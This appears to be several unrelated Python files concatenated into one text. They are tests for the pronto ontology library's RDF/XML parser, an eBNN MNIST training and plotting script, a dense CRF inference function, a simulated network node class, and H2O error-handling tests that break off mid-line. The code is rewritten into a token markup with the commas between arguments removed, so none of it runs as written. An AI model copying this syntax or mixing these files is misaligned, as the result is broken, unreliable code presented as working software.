<import_stmt>io<import_stmt>os<import_stmt>unittest<import_stmt>warnings<import_stmt>xml.etree.ElementTree<as>etree<import_stmt>pronto<class_stmt>TestRdfXMLParser(unittest.TestCase)<block_start>@staticmethod<def_stmt>get_ontology content<block_start>xml=f""" <rdf:RDF xmlns="http://purl.obolibrary.org/obo/TEMP#" xml:base="http://purl.obolibrary.org/obo/TEMP" xmlns:obo="http://purl.obolibrary.org/obo/" xmlns:owl="http://www.w3.org/2002/07/owl#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:xml="http://www.w3.org/XML/1998/namespace" xmlns:xsd="http://www.w3.org/2001/XMLSchema#" xmlns:doap="http://usefulinc.com/ns/doap#" xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#" xmlns:oboInOwl="http://www.geneontology.org/formats/oboInOwl#"> {content} </rdf:RDF> """<line_sep>s=io.BytesIO(xml.encode('utf-8'))<line_sep><return>pronto.Ontology(s import_depth=0)<block_end><def_stmt>setUp self<block_start>warnings.simplefilter("error")<block_end><def_stmt>tearDown self<block_start>warnings.simplefilter(warnings.defaultaction)<block_end># --- <def_stmt>test_iao self<block_start>warnings.simplefilter("ignore")<line_sep>path=os.path.join(__file__ ".." ".." "data" "iao.owl")<line_sep>iao=pronto.Ontology(os.path.realpath(path))<line_sep>self.assertEqual(len(iao.terms()) 245)<block_end><def_stmt>test_aeo self<block_start>warnings.simplefilter("ignore")<line_sep>path=os.path.join(__file__ ".." ".." "data" "aeo.owl")<line_sep>aeo=pronto.Ontology(os.path.realpath(path))<line_sep>self.assertEqual(len(aeo.terms()) 250)<line_sep>self.assertEqual(len(aeo.relationships()) 11)<line_sep>self.assertEqual(aeo["AEO:0000099"].name "keratin-based structure")<line_sep>self.assertEqual(len(aeo["AEO:0000099"].definition.xrefs) 1)<block_end><def_stmt>test_invalid_xml_file self<block_start>self.assertRaises(ValueError self.get_ontology "")<block_end># ------------------------------------------------------------------------ <def_stmt>test_metadata_auto_generated_by self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:auto-generated-by>pronto</oboInOwl:auto-generated-by> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.auto_generated_by "pronto")<block_end><def_stmt>test_metadata_default_namespace self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:hasDefaultNamespace rdf:datatype="http://www.w3.org/2001/XMLSchema#string">thing</oboInOwl:hasDefaultNamespace> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.default_namespace "thing")<block_end><def_stmt>test_metadata_data_version self# owl:versionrIRI <block_start>ont=self.get_ontology(""" <owl:Ontology rdf:about="http://purl.obolibrary.org/obo/ms.owl"> <owl:versionIRI rdf:resource="http://purl.obolibrary.org/obo/ms/4.1.30/ms.owl"/> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.ontology "ms")<line_sep>self.assertEqual(ont.metadata.data_version "4.1.30")<line_sep># doap:Version ont2=self.get_ontology("<owl:Ontology><doap:Version>0.1.0</doap:Version></owl:Ontology>")<line_sep>self.assertEqual(ont2.metadata.data_version "0.1.0")<block_end><def_stmt>test_metadata_format_version self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:hasOBOFormatVersion>1.2</oboInOwl:hasOBOFormatVersion> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.format_version "1.2")<block_end><def_stmt>test_metadata_imports self<block_start>ont=self.get_ontology(""" <owl:Ontology> <owl:imports rdf:resource="http://purl.obolibrary.org/obo/ms.obo"/> </owl:Ontology> """)<line_sep>self.assertIn("http://purl.obolibrary.org/obo/ms.obo" ont.metadata.imports)<block_end><def_stmt>test_metadata_saved_by self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:savedBy><NAME></oboInOwl:savedBy> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.saved_by "<NAME>")<block_end># ------------------------------------------------------------------------ <def_stmt>test_term_consider self# Extract from `oboInOwl:consider` text <block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:consider rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:002</oboInOwl:consider> </owl:Class> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"/> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertIn("TST:002" ont)<line_sep>self.assertIn(ont["TST:002"] ont["TST:001"].consider)<line_sep># Extract from `oboInOwl:consider` RDF resource ont2=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:consider rdf:resource="http://purl.obolibrary.org/obo/TST_002"/> </owl:Class> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"/> """)<line_sep>self.assertIn("TST:001" ont2)<line_sep>self.assertIn("TST:002" ont2)<line_sep>self.assertIn(ont2["TST:002"] ont2["TST:001"].consider)<block_end><def_stmt>test_term_definition_as_property self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <obo:IAO_0000115 rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</obo:IAO_0000115> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].definition "a term")<line_sep>self.assertEqual(len(ont["TST:001"].definition.xrefs) 0)<block_end><def_stmt>test_term_definition_as_axiom self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <obo:IAO_0000115 rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</obo:IAO_0000115> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://purl.obolibrary.org/obo/IAO_0000115"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</owl:annotatedTarget> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> </owl:Axiom> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].definition "a term")<line_sep>self.assertEqual(list(ont["TST:001"].definition.xrefs)[0] pronto.Xref("ISBN:1234"))<block_end><def_stmt>test_term_multiple_labels self<block_start>txt=""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <rdfs:label>A</rdfs:label> <rdfs:label>B</rdfs:label> </owl:Class> """<line_sep># check multiple labels is a syntax error in error mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("error" pronto.warnings.SyntaxWarning)<with_stmt>self.assertRaises(SyntaxError)<block_start>ont=self.get_ontology(txt)<block_end><block_end># check multiple labels is fine in ignore mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(txt)<line_sep>self.assertIn(ont['TST:001'].name ["A" "B"])<block_end><block_end><def_stmt>test_term_subclass_of self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"> <rdfs:subClassOf rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> </owl:Class> """)<line_sep>self.assertIn(ont["TST:001"] ont["TST:002"].superclasses().to_set())<line_sep>self.assertIn(ont["TST:002"] ont["TST:001"].subclasses().to_set())<block_end><def_stmt>test_term_subset self<block_start>ont=self.get_ontology(""" <owl:Ontology rdf:about="http://purl.obolibrary.org/obo/tst.owl"/> <owl:AnnotationProperty rdf:about="http://purl.obolibrary.org/obo/tst#ss"> <rdfs:comment rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a subset</rdfs:comment> <rdfs:subPropertyOf rdf:resource="http://www.geneontology.org/formats/oboInOwl#SubsetProperty"/> </owl:AnnotationProperty> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <oboInOwl:inSubset rdf:resource="http://purl.obolibrary.org/obo/tst#ss"/> </owl:Class> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].subsets {"ss"})<block_end><def_stmt>test_term_synonym_as_property self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasExactSynonym rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</oboInOwl:hasExactSynonym> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<block_end>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(len(ont["TST:001"].synonyms) 1)<line_sep>syn=next(iter(ont["TST:001"].synonyms))<line_sep>self.assertEqual(syn.description "stuff")<line_sep>self.assertEqual(syn.scope "EXACT")<line_sep>self.assertEqual(syn.xrefs set())<block_end><def_stmt>test_term_synonym_as_axiom self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasExactSynonym rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</oboInOwl:hasExactSynonym> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasExactSynonym"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</owl:annotatedTarget> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> </owl:Axiom> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(len(ont["TST:001"].synonyms) 1)<line_sep>syn=next(iter(ont["TST:001"].synonyms))<line_sep>self.assertEqual(syn.description "stuff")<line_sep>self.assertEqual(syn.scope "EXACT")<line_sep>self.assertEqual(syn.xrefs {pronto.Xref("ISBN:1234")})<block_end><block_end><def_stmt>test_term_relationship self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/RO_0002202"> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#TransitiveProperty"/> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">RO:0002202</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string"></oboInOwl:id> <oboInOwl:shorthand rdf:datatype="http://www.w3.org/2001/XMLSchema#string">develops_from</oboInOwl:shorthand> <rdfs:label rdf:datatype="http://www.w3.org/2001/XMLSchema#string">develops from</rdfs:label> </owl:ObjectProperty> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"> <rdfs:subClassOf> <owl:Restriction> <owl:onProperty rdf:resource="http://purl.obolibrary.org/obo/RO_0002202"/> <owl:someValuesFrom rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> </owl:Restriction> </rdfs:subClassOf> </owl:Class> """)<line_sep>self.assertIn("develops_from" [r.id<for>r ont.relationships()])<line_sep>develops_from=ont.get_relationship("develops_from")<line_sep>self.assertIn(ont["TST:001"] ont["TST:002"].relationships[develops_from])<block_end><def_stmt>test_term_xref_as_property_resource self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:resource="http://purl.obolibrary.org/obo/ISBN_1234"/> </owl:Class> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<block_end><def_stmt>test_term_xref_as_property_text self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<block_end><def_stmt>test_term_xref_as_axiom_without_description self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasDbXref"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</owl:annotatedTarget> </owl:Axiom> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].description <none>)<block_end><def_stmt>test_term_xref_as_axiom_with_description self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasDbXref"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</owl:annotatedTarget> <rdfs:label rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a great book</rdfs:label> </owl:Axiom> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].description "a great book")<block_end># ------------------------------------------------------------------------ <def_stmt>test_relationship_cyclic self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <oboInOwl:is_cyclic rdf:datatype="http://www.w3.org/2001/XMLSchema#boolean">true</oboInOwl:is_cyclic> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").cyclic)<block_end><def_stmt>test_relationship_functional self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#FunctionalProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").functional)<block_end><def_stmt>test_relationship_multiple_labels self<block_start>txt=""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <rdfs:label>A</rdfs:label> <rdfs:label>B</rdfs:label> </owl:ObjectProperty> """<line_sep># check multiple labels is a syntax error in error mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("error" pronto.warnings.SyntaxWarning)<with_stmt>self.assertRaises(SyntaxError)<block_start>ont=self.get_ontology(txt)<block_end><block_end># check multiple labels is fine in ignore mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(txt)<line_sep>self.assertIn(ont.get_relationship('TST:001').name ["A" "B"])<block_end><block_end><def_stmt>test_relationship_reflexive self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#ReflexiveProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").reflexive)<block_end><def_stmt>test_relationship_subset self<block_start>ont=self.get_ontology(""" <owl:Ontology rdf:about="http://purl.obolibrary.org/obo/tst.owl"/> <owl:AnnotationProperty rdf:about="http://purl.obolibrary.org/obo/tst#ss"> <rdfs:comment rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a subset</rdfs:comment> <rdfs:subPropertyOf rdf:resource="http://www.geneontology.org/formats/oboInOwl#SubsetProperty"/> </owl:AnnotationProperty> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/tst#friend_of"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">friend_of</oboInOwl:id> <oboInOwl:inSubset rdf:resource="http://purl.obolibrary.org/obo/tst#ss"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("friend_of" ont.relationships())<line_sep>self.assertEqual(ont.get_relationship("friend_of").subsets {"ss"})<block_end><def_stmt>test_relationship_symmetric self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#SymmetricProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").symmetric)<block_end><block_end>
<import_stmt>os<import_stmt>sys<line_sep>sys.path.append('..')<import_stmt>argparse<import_stmt>chainer<import_from_stmt>elaas.elaas Collection<import_from_stmt>elaas.family.simple SimpleHybridFamily<import_from_stmt>elaas.family.binary BinaryFamily<import_from_stmt>elaas.family.float FloatFamily<import_from_stmt>elaas.family.multi_input_edge_with_dropout MultiInputEdgeDropoutFamily<import_from_stmt>visualize visualize<import_stmt>deepopt.chooser<import_stmt>matplotlib<line_sep>matplotlib.rcParams['font.size']=20.0<import_stmt>matplotlib.pyplot<as>plt<def_stmt>max_acc trace<block_start>acc=0<line_sep>best_idx=0<for_stmt>i,t enumerate(trace)<block_start><if_stmt>t['action']<eq>'add_point'<block_start>acc=max(acc t['y'])<line_sep>best_idx=i<block_end><block_end><return>acc best_idx<block_end>model_dict={"binary":BinaryFamily "float":FloatFamily}<def_stmt>train_model args model_type nfilters<block_start>trainer=Collection(model_type args.save_dir nepochs=args.epochs verbose=args.verbose)<line_sep>trainer.set_model_family(model_dict[model_type])<line_sep>train,test=chainer.datasets.get_mnist(ndim=3)<line_sep>data_shape=train._datasets[0].shape[1:]<line_sep>trainer.add_trainset(train)<line_sep>trainer.add_testset(test)<line_sep>trainer.set_searchspace(nfilters_embeded=[nfilters] nlayers_embeded=[2] lr=[1e-3])<line_sep>res=trainer.train(niters=args.iters bootstrap_nepochs=args.bootstrap_epochs)<line_sep><return>max_acc(res)[0]<block_end>parser=argparse.ArgumentParser(description='Training Simple eBNN model')<line_sep>parser.add_argument('-s' '--save_dir' default='_models')<line_sep>parser.add_argument('-c' '--c_file' default=os.path.join('c' 'simple.h'))<line_sep>parser.add_argument('--inter_file' default=os.path.join('c' 'inter_simple.h'))<line_sep>parser.add_argument('-i' '--iters' type=int default=10)<line_sep>parser.add_argument('-e' '--epochs' type=int default=20)<line_sep>parser.add_argument('-b' '--bootstrap_epochs' type=int default=2)<line_sep>parser.add_argument('-v' '--verbose' action='store_true')<line_sep>parser.add_argument('--gen_inter' action='store_true')<line_sep>args=parser.parse_args()<line_sep>names=['float' 'binary']<line_sep>accs={name:[]<for>name names}<line_sep>mem={name:[]<for>name names}<for_stmt>i [1 2 3 4 5]<block_start>acc=train_model(args 'float' i)<line_sep>print(acc)<line_sep>accs['float'].append(acc<times>100)<line_sep>mem['float'].append(i<times>32<times>32<times>9)<block_end>print("====")<line_sep>binary_accs=[]<line_sep>binary_mem=[]<for_stmt>i [1 3 5 10 20 40 80 160]<block_start>acc=train_model(args 'binary' i)<line_sep>print(acc)<line_sep>accs['binary'].append(acc<times>100)<line_sep>mem['binary'].append(i<times>32<times>9)<block_end>#plot code linewidth=4<line_sep>ms=8<line_sep>colors={'binary':'#FF944D' 'float':'#FF8F80'}<line_sep>styles={'binary':'-o' 'float':'-.o'}<line_sep>plt.figure(figsize=(8 6.5))<for_stmt>name names<block_start>plt.plot(mem[name] accs[name] styles[name] linewidth=linewidth ms=ms color=colors[name] label=name)<block_end>plt.xlabel('Memory (bits)')<line_sep>plt.ylabel('Classification Accuracy (%)')<line_sep>plt.legend(loc=0 prop={'size':14})<line_sep>plt.tight_layout()<line_sep>plt.grid()<line_sep>plt.savefig("comparison_2layer.png")<line_sep>plt.clf()<line_sep>
<import_stmt>numpy<as>np<import_stmt>pydensecrf.densecrf<as>dcrf<import_from_stmt>pydensecrf.utils unary_from_softmax<def_stmt>crf_inference img probs t=10 scale_factor=1 labels=21<block_start>h,w=img.shape[:2]<line_sep>n_labels=labels<line_sep>d=dcrf.DenseCRF2D(w h n_labels)<line_sep>unary=unary_from_softmax(probs)<line_sep>unary=np.ascontiguousarray(unary)<line_sep>d.setUnaryEnergy(unary)<line_sep>d.addPairwiseGaussian(sxy=3/scale_factor compat=3)<line_sep>d.addPairwiseBilateral(sxy=80/scale_factor srgb=13 rgbim=np.copy(img) compat=10)<line_sep>Q=d.inference(t)<line_sep><return>np.array(Q).reshape((n_labels h w))<block_end>
# -*- coding: utf-8 -*- # MIT License: <NAME> <import_stmt>random<import_stmt>threading<import_stmt>time<import_from_stmt>collections defaultdict<try_stmt><block_start><import_from_stmt>queue Queue<block_end><except_stmt>ImportError<block_start><import_from_stmt>Queue Queue<block_end><import_from_stmt>.filters LoopbackFilter<line_sep># Physical Layer (copper, fiber, audio, wireless) # Link Layer (ethernet, ARP, PPP): links.py # Network Layer (IPv4, IPv6, ICMP, MeshP): scapy # Transport Layer (TCP, UDP, SCTP): scapy # Nodes connect to each other over links. The node has a runloop that pulls packets off the link's incoming packet Queue, # runs them through its list of filters, then places it in the nodes incoming packet queue for that interface node.inq. # the Node's Program is has a seperate runloop in a different thread that is constantly calling node.inq.get(). # The program does something with the packet (like print it to the screen, or reply with "ACK"), and sends any outgoing responses # by calling the Node's send() method directly. The Node runs the packet through it's outgoing packet filters in order, then # if it wasn't dropped, calls the network interface's .send() method to push it over the network. # --> incoming packet queue | -> pulls packets off link's inq -> filters -> node.inq | -> pulls packets off the node's inq # [LINK] | [NODE] | [PROGRAM] # <-- outgoing Link.send() | <---- outgoing filters <----- Node.send() <----- | <- sends responses by calling Node.send() <class_stmt>Node(threading.Thread)<block_start>"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to. Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle. Programs process packets off the node's incoming queue, then send responses out through node's outbound filters, and finally out to the right network interface. """<def_stmt>__init__ self interfaces=<none> name="n1" promiscuous=<false> mac_addr=<none> Filters=() Program=<none><block_start>threading.Thread.__init__(self)<line_sep>self.name=name<line_sep>self.interfaces=interfaces<or>[]<line_sep>self.keep_listening=<true><line_sep>self.promiscuous=promiscuous<line_sep>self.mac_addr=mac_addr<or>self._generate_MAC(6 2)<line_sep>self.inq=defaultdict(Queue)# TODO: convert to bounded ring-buffer self.filters=[LoopbackFilter()]+[F()<for>F Filters]# initialize the filters that shape incoming and outgoing traffic before it hits the program self.program=Program(node=self)<if>Program<else><none># init the program that will be processing incoming packets <block_end><def_stmt>__repr__ self<block_start><return>"[{0}]".format(self.name)<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end>@staticmethod<def_stmt>_generate_MAC segments=6 segment_length=2 delimiter=":" charset="0123456789abcdef"<block_start>"""generate a non-guaranteed-unique mac address"""<line_sep>addr=[]<for_stmt>_ range(segments)<block_start>sub=''.join(random.choice(charset)<for>_ range(segment_length))<line_sep>addr.append(sub)<block_end><return>delimiter.join(addr)<block_end><def_stmt>log self *args<block_start>"""stdout and stderr for the node"""<line_sep>print("%s %s"%(str(self).ljust(8) " ".join(str(x)<for>x args)))<block_end><def_stmt>stop self<block_start>self.keep_listening=<false><if_stmt>self.program<block_start>self.program.stop()<block_end>self.join()<line_sep><return><true><block_end>### Runloop <def_stmt>run self<block_start>"""runloop that gets triggered by node.start() reads new packets off the link and feeds them to recv() """<if_stmt>self.program<block_start>self.program.start()<block_end><while_stmt>self.keep_listening<block_start><for_stmt>interface self.interfaces<block_start>packet=interface.recv(self.mac_addr<if><not>self.promiscuous<else>"00:00:00:00:00:00")<if_stmt>packet<block_start>self.recv(packet interface)<block_end>time.sleep(0.01)<block_end><block_end>self.log("Stopped listening.")<block_end>### IO <def_stmt>recv self packet interface<block_start>"""run incoming packet through the filters, then place it in its inq"""<line_sep># the packet is piped into the first filter, then the result of that into the second filter, etc. <for_stmt>f self.filters<block_start><if_stmt><not>packet<block_start><break><block_end>packet=f.tr(packet interface)<block_end><if_stmt>packet# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq # self.log("IN ", str(interface).ljust(30), packet.decode()) <block_start>self.inq[interface].put(packet)<block_end><block_end><def_stmt>send self packet interfaces=<none><block_start>"""write packet to given interfaces, default is broadcast to all interfaces"""<line_sep>interfaces=interfaces<or>self.interfaces# default to all interfaces interfaces=interfaces<if>hasattr(interfaces '__iter__')<else>[interfaces]<for_stmt>interface interfaces<block_start><for_stmt>f self.filters<block_start>packet=f.tx(packet interface)# run outgoing packet through the filters <block_end><if_stmt>packet# if not dropped, log the transmit and pass it to the interface's send method # self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode()) <block_start>interface.send(packet)<block_end><block_end><block_end><block_end>
<import_stmt>sys<line_sep>sys.path.insert(1 "../../")<import_stmt>h2o<import_from_stmt>h2o.estimators H2OGradientBoostingEstimator<import_from_stmt>h2o.exceptions H2OResponseError<import_from_stmt>h2o.schemas H2OErrorV3 H2OModelBuilderErrorV3<import_from_stmt>tests pyunit_utils<as>pu<def_stmt>test_backend_error <block_start><try_stmt><block_start>h2o.api("GET /3/Foo" data=dict(bar='baz'))<assert_stmt><false> "API call should have failed"<block_end><except_stmt>H2OResponseError<as>e<block_start>backend_err=e.args[0]<assert_stmt>isinstance(backend_err H2OErrorV3)<assert_stmt>backend_err.endpoint<eq>"GET /3/Foo"<assert_stmt>backend_err.payload<eq>(<none> <none> <none> dict(bar='baz'))# yeah! because on GET, data becomes params and turns into None, this is so confusing! <assert_stmt>backend_err.http_status<eq>404<assert_stmt>isinstance(backend_err.stacktrace list)<assert_stmt>len(backend_err.stacktrace)<g>10<assert_stmt>backend_err.stacktrace[0]<eq>"water.exceptions.H2ONotFoundArgumentException: Resource /3/Foo not found"<assert_stmt>backend_err.msg<eq>"Resource /3/Foo not found"<assert_stmt>backend_err.dev_msg<eq>backend_err.msg<assert_stmt>backend_err.exception_msg<eq>backend_err.msg<assert_stmt>backend_err.exception_type<eq>"water.exceptions.H2ONotFoundArgumentException"<assert_stmt>backend_err.error_url<eq>"Resource /3/Foo"<assert_stmt>backend_err.timestamp<g>0<assert_stmt>len(backend_err.values)<eq>0<block_end><block_end><def_stmt>test_model_builds_error <block_start><try_stmt><block_start>df=h2o.import_file(path=pu.locate("smalldata/prostate/prostate.csv"))<line_sep>gbm=H2OGradientBoostingEstimator()<line_sep>gbm.train(y=-1 training_frame=df offset_column="foo")<assert_stmt><false> "model training should have failed"<block_end><except_stmt>H2OResponseError<as>e<block_start>mb_err=e.args[0]<assert_stmt>isinstance(mb_err H2OModelBuilderErrorV3)<assert_stmt>mb_err.endpoint<eq>"POST 